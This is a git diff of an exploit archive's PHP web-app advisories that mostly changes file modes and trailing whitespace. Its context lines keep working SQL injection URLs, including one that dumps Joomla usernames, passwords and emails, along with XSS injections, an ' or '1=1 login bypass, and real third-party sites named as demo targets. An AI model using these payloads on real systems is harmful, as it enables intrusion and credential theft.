a/platforms/php/webapps/12608.txt b/platforms/php/webapps/12608.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12609.txt b/platforms/php/webapps/12609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12611.txt b/platforms/php/webapps/12611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12612.txt b/platforms/php/webapps/12612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12613.txt b/platforms/php/webapps/12613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12615.txt b/platforms/php/webapps/12615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12617.txt b/platforms/php/webapps/12617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12618.txt b/platforms/php/webapps/12618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12619.txt b/platforms/php/webapps/12619.txt old mode 100755 new mode 100644 index 7b86db1b3..a1b621c6f --- a/platforms/php/webapps/12619.txt +++ b/platforms/php/webapps/12619.txt @@ -21,4 +21,4 @@ Cybertek CMS Local File Include Vulnerability [+] Done ... ! :)) -######################################## \ No newline at end of file +######################################## \ No newline at end of file diff --git a/platforms/php/webapps/12620.txt b/platforms/php/webapps/12620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12623.txt b/platforms/php/webapps/12623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12624.txt b/platforms/php/webapps/12624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12628.txt b/platforms/php/webapps/12628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12629.txt b/platforms/php/webapps/12629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12630.txt b/platforms/php/webapps/12630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12631.txt b/platforms/php/webapps/12631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12632.txt b/platforms/php/webapps/12632.txt old mode 100755 new mode 100644 index 38ff72a75..d567c90c2 --- a/platforms/php/webapps/12632.txt +++ b/platforms/php/webapps/12632.txt @@ -20,4 +20,4 @@ http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-3/**/uNI [+]########################################################################################################################################################[+] -[!] Th4nks : Fantastik, MitolocyA, ISYAN, \ No newline at end of file +[!] Th4nks : Fantastik, MitolocyA, ISYAN, \ No newline at end of file diff --git a/platforms/php/webapps/12633.txt b/platforms/php/webapps/12633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12634.txt b/platforms/php/webapps/12634.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12635.txt b/platforms/php/webapps/12635.txt old mode 100755 new mode 100644 index a7e0b6561..9134fc335 --- a/platforms/php/webapps/12635.txt +++ b/platforms/php/webapps/12635.txt @@ -29,7 +29,4 @@ HCJ - g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers ! - - - \ No newline at end of file + g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers ! \ No newline at end of file diff --git a/platforms/php/webapps/12636.txt b/platforms/php/webapps/12636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12637.txt b/platforms/php/webapps/12637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12639.txt b/platforms/php/webapps/12639.txt old mode 100755 new mode 100644 index c172cdbfd..57b9c60e7 --- a/platforms/php/webapps/12639.txt +++ b/platforms/php/webapps/12639.txt @@ -18,4 +18,4 @@ http://[site]/index.php?option=com_event&task=view&id=-14%20UnioN/**/SelECt%201, Thanks To All Muslims -h8k@hotmail.it \ No newline at end of file +h8k@hotmail.it \ No newline at end of file diff --git a/platforms/php/webapps/12641.txt b/platforms/php/webapps/12641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12642.txt b/platforms/php/webapps/12642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12644.txt b/platforms/php/webapps/12644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12645.txt b/platforms/php/webapps/12645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12646.txt b/platforms/php/webapps/12646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12647.txt b/platforms/php/webapps/12647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12648.txt b/platforms/php/webapps/12648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12651.txt b/platforms/php/webapps/12651.txt old mode 100755 new mode 100644 index bac6ac934..d4d679902 --- a/platforms/php/webapps/12651.txt +++ b/platforms/php/webapps/12651.txt @@ -25,8 +25,4 @@ * Fuck to Malaysia <= the truly thief asia * For HaMaDa SCoOoRPioN are you layz????? copy my exploit??? http://securityreason.com/securityalert/7161 - http://securityreason.com/exploitalert/7413 Look Date!!! your copy my style!!! - - - - \ No newline at end of file + http://securityreason.com/exploitalert/7413 Look Date!!! your copy my style!!! \ No newline at end of file diff --git a/platforms/php/webapps/12654.txt b/platforms/php/webapps/12654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12656.txt b/platforms/php/webapps/12656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12659.txt b/platforms/php/webapps/12659.txt old mode 100755 new mode 100644 index d6e7509a0..02f6ac207 --- a/platforms/php/webapps/12659.txt +++ b/platforms/php/webapps/12659.txt @@ -18,4 +18,4 @@ Sql Injection: http://localhost/[path]/section.php?id=1 (SQL) -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12661.txt b/platforms/php/webapps/12661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12666.txt b/platforms/php/webapps/12666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12671.txt b/platforms/php/webapps/12671.txt old mode 100755 new mode 100644 index b460023bc..389d4d931 --- a/platforms/php/webapps/12671.txt +++ b/platforms/php/webapps/12671.txt @@ -39,6 +39,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12674.txt b/platforms/php/webapps/12674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12676.txt b/platforms/php/webapps/12676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12684.txt b/platforms/php/webapps/12684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12686.txt b/platforms/php/webapps/12686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12688.txt b/platforms/php/webapps/12688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12690.php b/platforms/php/webapps/12690.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12691.txt b/platforms/php/webapps/12691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12692.txt b/platforms/php/webapps/12692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12694.txt b/platforms/php/webapps/12694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12695.txt b/platforms/php/webapps/12695.txt old mode 100755 new mode 100644 index fdc31f70c..5f3e7553e --- a/platforms/php/webapps/12695.txt +++ b/platforms/php/webapps/12695.txt @@ -26,4 +26,4 @@ ** user : ' or '1=1 ** password : ' or '1=1 ** -************************************************************ \ No newline at end of file +************************************************************ \ No newline at end of file diff --git a/platforms/php/webapps/12696.txt b/platforms/php/webapps/12696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12697.php b/platforms/php/webapps/12697.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12699.txt b/platforms/php/webapps/12699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1270.php b/platforms/php/webapps/1270.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12702.php b/platforms/php/webapps/12702.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12703.txt b/platforms/php/webapps/12703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12706.txt b/platforms/php/webapps/12706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12707.txt b/platforms/php/webapps/12707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12709.txt b/platforms/php/webapps/12709.txt old mode 100755 new mode 100644 index d13a5869a..ccd2d97ee --- a/platforms/php/webapps/12709.txt +++ b/platforms/php/webapps/12709.txt @@ -46,9 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12711.txt b/platforms/php/webapps/12711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12712.txt b/platforms/php/webapps/12712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12713.txt b/platforms/php/webapps/12713.txt old mode 100755 new mode 100644 index a59b5e540..10a4cf0c8 --- a/platforms/php/webapps/12713.txt +++ b/platforms/php/webapps/12713.txt @@ -46,7 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12714.txt b/platforms/php/webapps/12714.txt old mode 100755 new mode 100644 index d2a090d56..64f598ba7 --- a/platforms/php/webapps/12714.txt +++ b/platforms/php/webapps/12714.txt @@ -46,7 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12716.txt b/platforms/php/webapps/12716.txt old mode 100755 new mode 100644 index 791ebb279..9f2e2ce3d --- a/platforms/php/webapps/12716.txt +++ b/platforms/php/webapps/12716.txt @@ -19,4 +19,4 @@ http://localhost/[path]/property_more.php?id=-9999 union select 0,version(),2,3, Admin Panel http://localhost/[path]/admin -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12717.txt b/platforms/php/webapps/12717.txt old mode 100755 new mode 100644 index d245b2207..f6f8c667b --- a/platforms/php/webapps/12717.txt +++ b/platforms/php/webapps/12717.txt @@ -20,4 +20,4 @@ http://localhost/[path]/index.php?module=content&action=article&id=-80/**/union/ Admin Panel http://localhost/[path]/admin -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12718.txt b/platforms/php/webapps/12718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12719.txt b/platforms/php/webapps/12719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12720.txt b/platforms/php/webapps/12720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12721.txt b/platforms/php/webapps/12721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12722.txt b/platforms/php/webapps/12722.txt old mode 100755 new mode 100644 index ad4862c43..96d1f297b --- a/platforms/php/webapps/12722.txt +++ b/platforms/php/webapps/12722.txt @@ -15,4 +15,4 @@ Script Home: http://www.interuse.co.il/ Sql Injection: http://localhost/[path]/index2.php?id=6&catId=57&productId=-87%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,version%28%29,38,group_concat%28table_name%29,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20from%20information_schema.tables -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12724.php b/platforms/php/webapps/12724.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12725.txt b/platforms/php/webapps/12725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12726.txt b/platforms/php/webapps/12726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12727.txt b/platforms/php/webapps/12727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12729.txt b/platforms/php/webapps/12729.txt old mode 100755 new mode 100644 index fdec41d6b..74df27174 --- a/platforms/php/webapps/12729.txt +++ b/platforms/php/webapps/12729.txt @@ -21,4 +21,4 @@ Demo : http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15 -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12731.txt b/platforms/php/webapps/12731.txt old mode 100755 new mode 100644 index 894f93382..bf1cfab15 --- a/platforms/php/webapps/12731.txt +++ b/platforms/php/webapps/12731.txt @@ -30,4 +30,4 @@ [~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~] -[~] Th4nks : Fantastik, MitolocyA, ISYAN, \ No newline at end of file +[~] Th4nks : Fantastik, MitolocyA, ISYAN, \ No newline at end of file diff --git a/platforms/php/webapps/12732.php b/platforms/php/webapps/12732.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12735.txt b/platforms/php/webapps/12735.txt old mode 100755 new mode 100644 index 93843c6f8..48bad8c8a --- a/platforms/php/webapps/12735.txt +++ b/platforms/php/webapps/12735.txt @@ -50,7 +50,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12736.txt b/platforms/php/webapps/12736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12737.txt b/platforms/php/webapps/12737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12743.txt b/platforms/php/webapps/12743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12744.txt b/platforms/php/webapps/12744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12746.txt b/platforms/php/webapps/12746.txt old mode 100755 new mode 100644 index 93680ee94..b0b70269a --- a/platforms/php/webapps/12746.txt +++ b/platforms/php/webapps/12746.txt @@ -45,4 +45,4 @@ http://server/cat4.php?catID=<font color=red size=15>XroGuE</font> [+] Live Demo : http://server/cat1.php?catID=-999+union+all+select+1,version(),database()-- -########################################### \ No newline at end of file +########################################### \ No newline at end of file diff --git a/platforms/php/webapps/12748.txt b/platforms/php/webapps/12748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12749.txt b/platforms/php/webapps/12749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12754.html b/platforms/php/webapps/12754.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12755.txt b/platforms/php/webapps/12755.txt old mode 100755 new mode 100644 index 2ce76892f..63d5c7f91 --- a/platforms/php/webapps/12755.txt +++ b/platforms/php/webapps/12755.txt @@ -19,4 +19,4 @@ http://localhost/[path]/itemdetail.php?itemid=-39 union select 0,1,2,3,4,5,group http://localhost/[path]/shop.php?storeid=77 and 1=2 http://localhost/[path]/shop.php?storeid=77 and 1=1 -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12756.txt b/platforms/php/webapps/12756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12761.txt b/platforms/php/webapps/12761.txt old mode 100755 new mode 100644 index 7dcb2a03a..ba0a2877b --- a/platforms/php/webapps/12761.txt +++ b/platforms/php/webapps/12761.txt @@ -45,10 +45,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12763.txt b/platforms/php/webapps/12763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12766.txt b/platforms/php/webapps/12766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12767.txt b/platforms/php/webapps/12767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12768.txt b/platforms/php/webapps/12768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12769.txt b/platforms/php/webapps/12769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12770.txt b/platforms/php/webapps/12770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12771.txt b/platforms/php/webapps/12771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12772.txt b/platforms/php/webapps/12772.txt old mode 100755 new mode 100644 index 8902a27b8..8c1e5acca --- a/platforms/php/webapps/12772.txt +++ b/platforms/php/webapps/12772.txt @@ -47,4 +47,4 @@ am nt hacker just Lik3 Syst3m S3curity .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12773.txt b/platforms/php/webapps/12773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12776.txt b/platforms/php/webapps/12776.txt old mode 100755 new mode 100644 index 928e154f8..4fb312bde --- a/platforms/php/webapps/12776.txt +++ b/platforms/php/webapps/12776.txt @@ -28,4 +28,4 @@ http://localhost/[path]/gallery.php?idfestival=7&idgallery=56 (SQL) http://localhost/[path]/contact.php?idfestival=7 (SQL) http://localhost/[path]/ (All Files).php?idfestival= (SQL) -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12777.txt b/platforms/php/webapps/12777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12779.txt b/platforms/php/webapps/12779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12780.txt b/platforms/php/webapps/12780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12781.txt b/platforms/php/webapps/12781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12782.txt b/platforms/php/webapps/12782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12787.txt b/platforms/php/webapps/12787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12788.txt b/platforms/php/webapps/12788.txt old mode 100755 new mode 100644 index e35f60dc5..f0edecbed --- a/platforms/php/webapps/12788.txt +++ b/platforms/php/webapps/12788.txt @@ -57,4 +57,4 @@ http://server/ver-noticia.php?id=<marquee><font color=Blue size=15>XroGuE</font> [+] Demo: http://server/verfoto.php?id= http://server/ver-noticia.php?id= -######################################################################## \ No newline at end of file +######################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/12790.txt b/platforms/php/webapps/12790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12791.txt b/platforms/php/webapps/12791.txt old mode 100755 new mode 100644 index 03055e5b0..aad4842ce --- a/platforms/php/webapps/12791.txt +++ b/platforms/php/webapps/12791.txt @@ -61,4 +61,4 @@ http://www.2for1golfcourses.co.uk/addreview.php?id="><marquee><font color=Blue s [+] Demo: http://server/newsarticle.php?id=10 and 1=1 [and 1=2] http://www.golfgreenfees.com/courses/courses/clubpage.php?id=30 and 1=1 [and 1=2] -######################################################################## \ No newline at end of file +######################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/12792.txt b/platforms/php/webapps/12792.txt old mode 100755 new mode 100644 index ac6babdcc..672102a21 --- a/platforms/php/webapps/12792.txt +++ b/platforms/php/webapps/12792.txt @@ -66,4 +66,4 @@ http://server/contentFolder.php?parentId= [+] Demo: http://server/contentFolder.php?parentId=1+and+1=1 [and+1=2] -######################################################################## \ No newline at end of file +######################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/12793.txt b/platforms/php/webapps/12793.txt old mode 100755 new mode 100644 index 71e2b7baf..3da9188e9 --- a/platforms/php/webapps/12793.txt +++ b/platforms/php/webapps/12793.txt @@ -47,10 +47,4 @@ am nt hacker just Lik3 Syst3m S3curity .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/php/webapps/12794.txt b/platforms/php/webapps/12794.txt old mode 100755 new mode 100644 index 5f2216357..746c71247 --- a/platforms/php/webapps/12794.txt +++ b/platforms/php/webapps/12794.txt @@ -27,4 +27,4 @@ Cyberlog, Cr4wl3r, Byz9991, Darkavanger, Newbie_Campuz,Unixcode,Bom2stalker, Pho Buat Yayank Ucrit I Love U Full :P -All Member Jatimcrew, Sekuritionline.. \ No newline at end of file +All Member Jatimcrew, Sekuritionline.. \ No newline at end of file diff --git a/platforms/php/webapps/12796.txt b/platforms/php/webapps/12796.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12797.txt b/platforms/php/webapps/12797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12798.txt b/platforms/php/webapps/12798.txt old mode 100755 new mode 100644 index 0242ab1d0..cd156ba1f --- a/platforms/php/webapps/12798.txt +++ b/platforms/php/webapps/12798.txt @@ -90,4 +90,4 @@ == Exploit-db.com == VBHACKER.NET/VB - == kannibal615 Copyright (c) 2010 \ No newline at end of file + == kannibal615 Copyright (c) 2010 \ No newline at end of file diff --git a/platforms/php/webapps/12801.txt b/platforms/php/webapps/12801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12805.txt b/platforms/php/webapps/12805.txt old mode 100755 new mode 100644 index de1ff4324..0a2d88b3c --- a/platforms/php/webapps/12805.txt +++ b/platforms/php/webapps/12805.txt @@ -44,4 +44,4 @@ [+] Demo: http://[site]/[path]/signinform.php?msg= -######################################################################## \ No newline at end of file +######################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/12806.txt b/platforms/php/webapps/12806.txt old mode 100755 new mode 100644 index d808cb16e..cb7b14289 --- a/platforms/php/webapps/12806.txt +++ b/platforms/php/webapps/12806.txt @@ -41,4 +41,4 @@ <marquee><font color=Blue size=15>XroGuE</font></marquee> -####################################################################### \ No newline at end of file +####################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/12807.txt b/platforms/php/webapps/12807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12808.txt b/platforms/php/webapps/12808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12809.txt b/platforms/php/webapps/12809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12811.txt b/platforms/php/webapps/12811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12812.txt b/platforms/php/webapps/12812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12813.txt b/platforms/php/webapps/12813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12814.txt b/platforms/php/webapps/12814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12817.txt b/platforms/php/webapps/12817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12818.txt b/platforms/php/webapps/12818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12819.txt b/platforms/php/webapps/12819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12820.txt b/platforms/php/webapps/12820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12822.txt b/platforms/php/webapps/12822.txt old mode 100755 new mode 100644 index 9f3e154e1..f530aff59 --- a/platforms/php/webapps/12822.txt +++ b/platforms/php/webapps/12822.txt @@ -34,4 +34,4 @@ open SQLi posibilities for get sense information from servers databases. Some li http://localhost/joomla/administrator/index.php?option=com_jsjobs&task=edit&cid[]=-69/*!union/**/select/**/1,2,3,group_concat%28username,0x3a,password,0x3a,email%29/**/from/**/jos_users*/-- -by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \ No newline at end of file +by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \ No newline at end of file diff --git a/platforms/php/webapps/12823.txt b/platforms/php/webapps/12823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12839.txt b/platforms/php/webapps/12839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12840.txt b/platforms/php/webapps/12840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12842.txt b/platforms/php/webapps/12842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12843.txt b/platforms/php/webapps/12843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12845.txt b/platforms/php/webapps/12845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12848.txt b/platforms/php/webapps/12848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12849.txt b/platforms/php/webapps/12849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12850.txt b/platforms/php/webapps/12850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12855.txt b/platforms/php/webapps/12855.txt old mode 100755 new mode 100644 index f4a3bd4d4..91da94e26 --- a/platforms/php/webapps/12855.txt +++ b/platforms/php/webapps/12855.txt @@ -34,4 +34,4 @@ Xploit : demo url:http://server/bazar/picturelib.php?cat=[rfi] ############################################################################ -#Sid3^effects \ No newline at end of file +#Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/12856.txt b/platforms/php/webapps/12856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12857.txt b/platforms/php/webapps/12857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12858.txt b/platforms/php/webapps/12858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12859.txt b/platforms/php/webapps/12859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12861.txt b/platforms/php/webapps/12861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12866.txt b/platforms/php/webapps/12866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12867.txt b/platforms/php/webapps/12867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12868.txt b/platforms/php/webapps/12868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1289.php b/platforms/php/webapps/1289.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1296.txt b/platforms/php/webapps/1296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1298.php b/platforms/php/webapps/1298.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1312.php b/platforms/php/webapps/1312.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1315.php b/platforms/php/webapps/1315.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1319.php b/platforms/php/webapps/1319.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1320.txt b/platforms/php/webapps/1320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1324.php b/platforms/php/webapps/1324.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1329.php b/platforms/php/webapps/1329.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1337.php b/platforms/php/webapps/1337.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1340.php b/platforms/php/webapps/1340.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1342.php b/platforms/php/webapps/1342.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1354.php b/platforms/php/webapps/1354.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1356.php b/platforms/php/webapps/1356.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1358.php b/platforms/php/webapps/1358.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1359.php b/platforms/php/webapps/1359.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1361.c 